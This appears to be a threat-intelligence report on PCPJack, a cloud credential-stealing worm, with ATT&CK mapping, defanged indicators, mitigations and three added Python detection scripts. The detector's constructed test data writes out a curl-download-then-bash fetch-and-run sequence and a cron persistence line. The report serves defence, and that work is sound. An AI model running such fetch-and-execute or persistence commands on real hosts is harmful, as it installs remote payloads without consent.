Cloud attack framework skips cryptomining, harvests financial, messaging, and enterprise credentials for fraud, spam, and potential extortion.
Analysis Summary
# Tool/Technique: PCPJack
## Overview
PCPJack is a sophisticated, cloud-native credential theft framework and worm. Unlike common cloud malware that focuses on cryptocurrency mining, PCPJack is specifically designed to harvest high-value credentials from cloud infrastructure, containers, and developer tools for the purposes of fraud, spam, and extortion. A distinctive feature of this tool is its "eviction" capability, where it actively seeks out and removes artifacts associated with the **TeamPCP** threat actor group.
## Technical Details
- **Type:** Malware framework / Worm
- **Platform:** Linux (targeted at Cloud/Container environments including Docker, Kubernetes, Redis, and RayML)
- **Capabilities:** Credential harvesting, worm-like propagation (internal/external), TeamPCP tool eviction, persistence, and data exfiltration.
- **First Seen:** April 2026
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1190 - Exploit Public-Facing Application
- **TA0003 - Persistence**
  - T1543.002 - Create or Modify System Process: Systemd Service
  - T1053.003 - Scheduled Task/Job: Cron
- **TA0005 - Defense Evasion**
  - T1070 - Indicator Removal
  - T1484 - Impair Defenses (Evicting competing malware)
- **TA0006 - Credential Access**
  - T1552 - Unsecured Credentials
  - T1528 - Steal Application Access Token
- **TA0007 - Discovery**
  - T1046 - Network Service Discovery (Cloud scanning)
- **TA0008 - Lateral Movement**
  - T1021.004 - Remote Services: SSH
- **TA0010 - Exfiltration**
  - T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage (S3) / Telegram
## Functionality
### Core Capabilities
- **Victim Cleanup:** Scans for and terminates processes/containers associated with TeamPCP or PCPcat to ensure exclusive access to the host.
- **Credential Harvesting:** Targets specific environment variables, config files, and databases to steal keys for AWS, Azure, GCP, Slack, databases, and financial services.
- **Worm Propagation:** Uses `worm.py` and `cloud_scan.py` to scan both the internal network and external cloud IP ranges for vulnerable services (e.g., Redis, Kubernetes, RayML).
- **Environment Setup:** Automatically installs Python 3.6+ and necessary libraries (`requests`, `cryptography`, `pyarrow`) if they are missing on the victim host.
### Advanced Features
- **Asymmetric Encryption:** Encrypts the harvested data with an attacker-controlled public key before exfiltration, so that only the holder of the corresponding private key can read it; a network capture of the exfiltration traffic therefore does not expose the plaintext credentials.
- **Modular Architecture:** Consists of specialized Python modules for lateral movement, cloud scanning, and parsing specific credential formats.
- **Smart Target Selection:** Includes a blocklist check against the operator's IP to avoid accidental self-infection.
## Indicators of Compromise
### File Hashes (SHA-1)
- `a20a9924d92c2b06d82b79c0fe87451c650cabec` (bootstrap.sh)
- `0b86434ca5145636d745222f7e49c903ce6ef538` (worm.py)
- `01cebc48016395e284ac76afc1816f143ee3e7b6` (cloud_scan.py)
- `fed52a4bbac7b5b6ae4f76cab3eadd67e79227e3` (lateral.py)
### File Names / Paths
- `/var/lib/.spm/` (Working directory)
- `sys-monitor.service` (Systemd persistence)
- `harvest.jsonl` (Local store for stolen credentials)
- `bootstrap.sh`, `monitor.py`, `parser.py`
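The file hashes and paths above can be turned into a host sweep. The following script is an added example written for this report, not tooling from the report or from the actor; it walks a directory tree, hashes every file with SHA-1, and reports both hash matches against the listed digests and name matches against the listed file and directory names (name matches are kept separate because they are a weaker signal). The `build_demo_tree` and `run_demo` helpers construct a temporary directory that mirrors the report's layout with placeholder file contents, so the sweep can be exercised offline; the digest of the placeholder file is added to the hash list only for that demo.

```python
import hashlib
import os
import tempfile

# SHA-1 digests listed in the report for the PCPJack components.
KNOWN_SHA1 = {
    "a20a9924d92c2b06d82b79c0fe87451c650cabec": "bootstrap.sh",
    "0b86434ca5145636d745222f7e49c903ce6ef538": "worm.py",
    "01cebc48016395e284ac76afc1816f143ee3e7b6": "cloud_scan.py",
    "fed52a4bbac7b5b6ae4f76cab3eadd67e79227e3": "lateral.py",
}

# File and directory names listed in the report. An operator can rename files,
# so name hits are reported separately from hash hits.
KNOWN_NAMES = {
    ".spm", "sys-monitor.service", "harvest.jsonl",
    "bootstrap.sh", "monitor.py", "parser.py",
    "worm.py", "cloud_scan.py", "lateral.py",
}


def sha1_of_file(path, chunk=1 << 20):
    """Stream a file through SHA-1 so large files do not need to fit in memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(root, known_sha1=KNOWN_SHA1, known_names=KNOWN_NAMES):
    """Walk `root`; return (hash_hits, name_hits).

    hash_hits: list of (path, digest, label)   name_hits: list of paths
    """
    hash_hits, name_hits = [], []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d in known_names:
                name_hits.append(os.path.join(dirpath, d))
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            if fn in known_names:
                name_hits.append(full)
            try:
                digest = sha1_of_file(full)
            except OSError:  # unreadable or vanished file; skip rather than abort the sweep
                continue
            if digest in known_sha1:
                hash_hits.append((full, digest, known_sha1[digest]))
    return hash_hits, name_hits


def build_demo_tree(root):
    """Constructed layout mirroring the report's paths; returns the SHA-1 of the placeholder file."""
    spm = os.path.join(root, "var", "lib", ".spm")
    unit_dir = os.path.join(root, "etc", "systemd", "system")
    os.makedirs(spm)
    os.makedirs(unit_dir)
    placeholder = b"# constructed stand-in for a dropped script; not real malware content\n"
    with open(os.path.join(spm, "harvest.jsonl"), "wb") as f:
        f.write(b'{"constructed": true}\n')
    with open(os.path.join(spm, "dropped.py"), "wb") as f:
        f.write(placeholder)
    with open(os.path.join(unit_dir, "sys-monitor.service"), "w") as f:
        f.write("[Service]\nExecStart=/var/lib/.spm/monitor.py\n")
    return hashlib.sha1(placeholder).hexdigest()


def run_demo():
    """Sweep the constructed tree; the placeholder digest is added to the list only for this demo."""
    with tempfile.TemporaryDirectory() as root:
        demo_hash = build_demo_tree(root)
        hashes = dict(KNOWN_SHA1, **{demo_hash: "dropped.py (constructed)"})
        hash_hits, name_hits = sweep(root, known_sha1=hashes)
        return {
            "hash_hits": sorted(label for _, _, label in hash_hits),
            "name_hits": sorted(os.path.basename(p) for p in name_hits),
        }


if __name__ == "__main__":
    print(run_demo())
```

Run it against `/` (or a mounted forensic image) with `sweep("/")`; on a live host, expect name hits for any legitimately named `parser.py` or `monitor.py`, which is why a hash hit or a hit under `/var/lib/.spm/` is the finding to escalate.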
### Network Indicators
- `hxxps://spm-cdn-assets-dist-2026[.]s3[.]us-east-2[.]amazonaws[.]com` (Payload hosting)
- `161.97.186[.]175` (C2/Scanning)
- `213.136.80[.]73` (C2/Scanning)
- `38.242.204[.]245` (C2/Scanning)
### Behavioral Indicators
- Sudden installation of Python virtual environments in hidden directories.
- Mass outbound scanning on ports 6379 (Redis), 10250 (Kubelet), and 8265 (Ray).
- Automated removal of files or containers containing the strings "TeamPCP" or "PCPcat".
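The second behavioral indicator, mass outbound scanning on 6379, 10250 and 8265, is a fan-out pattern: one source reaching many distinct destinations on the same port in a short window. The following detector is an added example written for this report, not code from the report or from the actor. It reads flow records in a constructed CSV shape (`timestamp,src,dst,dport,action`), keeps a sliding 60-second window per source and port, and alerts when the number of distinct destinations in any window reaches a threshold. The sample flows are constructed: one workload probes 25 Redis targets while a second workload talks repeatedly to a single Redis host.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Ports named in the report's behavioral indicators.
SCAN_PORTS = {6379: "Redis", 10250: "Kubelet", 8265: "Ray"}


def parse_flows(lines):
    """Parse constructed flow records: ISO timestamp,src,dst,dport,action."""
    flows = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport, action = line.split(",")
        flows.append((datetime.fromisoformat(ts), src, dst, int(dport), action))
    return flows


def detect_fanout(flows, window=timedelta(seconds=60), threshold=20):
    """Alert when one source reaches `threshold` distinct destinations on a scan port within `window`."""
    by_key = defaultdict(list)  # (src, port) -> [(ts, dst)]
    for ts, src, dst, dport, _action in flows:
        if dport in SCAN_PORTS:
            by_key[(src, dport)].append((ts, dst))

    alerts = []
    for (src, port), events in by_key.items():
        events.sort()
        in_window = Counter()  # distinct destinations currently inside the sliding window
        start, peak = 0, 0
        for ts, dst in events:
            in_window[dst] += 1
            while ts - events[start][0] > window:  # evict events older than the window
                old = events[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            alerts.append({"src": src, "port": port,
                           "service": SCAN_PORTS[port], "distinct_targets": peak})
    return alerts


def constructed_sample():
    """Constructed flow log: one scanning pod, one benign pod, one low-volume probe."""
    base = datetime(2026, 4, 1, 12, 0, 0)
    lines = ["# ts,src,dst,dport,action"]
    # 10.42.0.17 probes 25 distinct hosts on 6379 inside 25 seconds (constructed scanner).
    for i in range(25):
        t = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{t},10.42.0.17,10.0.1.{i + 1},6379,REJECT")
    # The same pod touches 5 kubelets: below threshold, not alerted on its own.
    for i in range(5):
        t = (base + timedelta(seconds=30 + i)).isoformat()
        lines.append(f"{t},10.42.0.17,10.0.3.{i + 1},10250,REJECT")
    # 10.42.0.5 is an app pod talking to its own Redis many times (constructed benign traffic).
    for i in range(30):
        t = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{t},10.42.0.5,10.0.2.9,6379,ACCEPT")
    lines.append(f"{base.isoformat()},10.42.0.5,10.0.0.1,443,ACCEPT")
    return lines


if __name__ == "__main__":
    for alert in detect_fanout(parse_flows(constructed_sample())):
        print(alert)
```

Counting distinct destinations rather than raw flow volume is what separates a scanner from a chatty application: the benign pod generates more flows than the scanner but never exceeds one target. Tune the threshold to the fleet; a service mesh or health-checker that legitimately contacts many Redis replicas should be allowlisted by source rather than by raising the threshold for everyone.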
## Associated Threat Actors
- Potentially a former operator/affiliate of **TeamPCP**, indicated by deep familiarity with their internal tooling and a desire to displace the group's presence.
## Detection Methods
- **Behavioral:** Monitor for unexpected shell scripts downloading files from S3 buckets via `curl` or `wget` followed by immediate execution.
- **Process Monitoring:** Detect `systemd` services or `cron` jobs originating from hidden directories (e.g., `/var/lib/.spm/`).
- **Network:** Alert on high-volume internal or external port scanning originating from container workloads.
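The first two detection methods above can be expressed as rules over process and file telemetry. The script below is an added example written for this report, not code from the report or from the actor, and it assumes a generic event shape (timestamp, login session, command name, full command line) such as an EDR or auditd pipeline would provide. It correlates a `curl`/`wget` fetch from an S3 hostname with a later execution of the saved file in the same session, and separately flags systemd units and crontab lines whose commands live under a hidden directory. All events, the `example-bucket` hostname, and the unit and cron contents are constructed; the `/var/lib/.spm/`, `sys-monitor.service` and `monitor.py` names come from the report's indicators.

```python
import os
import re
import shlex
from datetime import datetime, timedelta

# Any host carrying an "s3" label under amazonaws.com, with an object key after it.
S3_URL = re.compile(r"https?://\S*\bs3[\w.-]*amazonaws\.com/\S+")
DOWNLOADERS = {"curl", "wget"}
OUTPUT_FLAGS = {"-o", "--output", "-O", "--output-document"}
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}


def download_target(comm, tokens):
    """Return (url, saved_path) when the command fetches from S3, else None."""
    url = next((t for t in tokens if S3_URL.match(t)), None)
    if url is None:
        return None
    saved = None
    for i, t in enumerate(tokens):
        # curl's -O means "use the remote name" and takes no argument; wget's -O takes a path.
        if t in OUTPUT_FLAGS and not (comm == "curl" and t == "-O") and i + 1 < len(tokens):
            saved = tokens[i + 1]
    if saved is None:
        saved = url.rsplit("/", 1)[-1]  # default: basename of the URL in the cwd
    return url, saved


def executed_path(tokens):
    """The file a command runs: argv[0], or the script handed to an interpreter."""
    if os.path.basename(tokens[0]) in INTERPRETERS:
        return next((t for t in tokens[1:] if not t.startswith("-")), None)
    return tokens[0]


def detect_download_then_exec(events, window=timedelta(seconds=120)):
    """events: dicts with ts (datetime), session, comm, cmdline, ordered by ts."""
    alerts, pending = [], []
    for ev in events:
        tokens = shlex.split(ev["cmdline"])
        if ev["comm"] in DOWNLOADERS:
            hit = download_target(ev["comm"], tokens)
            if hit:
                pending.append((ev["ts"], ev["session"], *hit))
            continue
        ran = executed_path(tokens)
        if ran is None:
            continue
        for ts, session, url, saved in pending:
            in_scope = session == ev["session"] and ev["ts"] - ts <= window
            # Basename comparison tolerates relative vs. absolute spellings of the same file.
            if in_scope and os.path.basename(ran) == os.path.basename(saved):
                alerts.append({"session": session, "url": url, "saved": saved,
                               "exec": ev["cmdline"]})
    return alerts


# Hidden path component such as "/.spm/"; a few user-level locations are expected and excluded.
HIDDEN_COMPONENT = re.compile(r"/(\.[^/\s]+)/")
BENIGN_HIDDEN = {".config", ".local", ".cache"}


def hidden_dir_refs(text):
    return sorted({m.group(1) for m in HIDDEN_COMPONENT.finditer(text)} - BENIGN_HIDDEN)


def detect_hidden_persistence(files):
    """files: {path: contents} for unit files and crontabs; returns {path: [hidden dirs]}."""
    return {path: refs for path, text in files.items() if (refs := hidden_dir_refs(text))}


def constructed_events():
    base = datetime(2026, 4, 1, 12, 0, 0)
    raw = [
        (0, 7, "curl", "curl -fsSL https://example-bucket.s3.us-east-2.amazonaws.com/bootstrap.sh"
                       " -o /var/lib/.spm/bootstrap.sh"),
        (3, 7, "bash", "bash /var/lib/.spm/bootstrap.sh"),                 # fetched from S3, then run
        (10, 9, "curl", "curl -fsSL https://pkgs.example.com/app.tar.gz -o /tmp/app.tar.gz"),
        (12, 9, "tar", "tar xzf /tmp/app.tar.gz"),                         # not an S3 source
        (20, 11, "wget", "wget https://example-bucket.s3.amazonaws.com/data.csv"),
        (25, 11, "python3", "python3 analyze.py data.csv"),                # S3 file is read, not executed
    ]
    return [{"ts": base + timedelta(seconds=s), "session": sess, "comm": c, "cmdline": cl}
            for s, sess, c, cl in raw]


def constructed_persistence():
    return {
        "/etc/systemd/system/sys-monitor.service":
            "[Service]\nExecStart=/var/lib/.spm/venv/bin/python /var/lib/.spm/monitor.py\n",
        "/etc/systemd/system/app.service": "[Service]\nExecStart=/usr/bin/app --serve\n",
        "/var/spool/cron/crontabs/root": "*/5 * * * * /var/lib/.spm/bootstrap.sh >/dev/null 2>&1\n",
        "/home/dev/.config/systemd/user/sync.service":
            "[Service]\nExecStart=/home/dev/.config/sync/run.sh\n",
    }


if __name__ == "__main__":
    print(detect_download_then_exec(constructed_events()))
    print(detect_hidden_persistence(constructed_persistence()))
```

Correlating on the same login session and a short window keeps the rule specific: an S3 download alone is routine in cloud workloads, and so is running a script, but the pair within two minutes matches the bootstrap pattern described above. The hidden-directory rule is deliberately narrow; extend `BENIGN_HIDDEN` with whatever dot-directories your own provisioning writes services into before deploying it fleet-wide.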
## Mitigation Strategies
- **Secrets Management:** Avoid storing plaintext credentials in environment variables or configuration files; use dedicated secrets managers (AWS Secrets Manager, HashiCorp Vault).
- **Network Segmentation:** Implement strict egress filtering for cloud workloads to prevent unauthorized connections to unknown S3 buckets or Telegram APIs.
- **Infrastructure Hardening:** Ensure Kubernetes APIs, Docker sockets, and Redis instances are not exposed to the public internet without strong authentication.
## Related Tools/Techniques
- **PCPcat:** The toolset associated with TeamPCP that PCPJack specifically targets for removal.
- **CloudVAMP:** Similar cloud-focused worms (though PCPJack is distinct for its lack of cryptomining).